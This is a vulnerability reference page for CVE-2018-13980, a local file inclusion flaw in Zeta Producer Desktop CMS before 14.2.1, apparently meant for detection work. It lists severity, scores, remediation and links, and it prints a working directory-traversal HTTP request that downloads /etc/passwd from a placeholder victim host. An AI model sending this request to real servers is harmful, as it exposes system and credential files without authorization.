🔙 목록으로 돌아가기

CVE-2018-13980: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion

TitleZeta Producer Desktop CMS <14.2.1 - Local File Inclusion
Authorwisnupramoedya
SeverityMedium
ImpactAn attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
RemediationUpgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability.
CVSS Score5.5
EPSS Score0.11342
CVE IDCVE-2018-13980
CWE IDCWE-22
Tags cve2018 cve lfi edb packetstorm zeta-producer vuln

🔍 Vulnerability Description

Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin “filebrowser” is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.

🌐 HTTP Request

GET /assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13980.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-13980.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A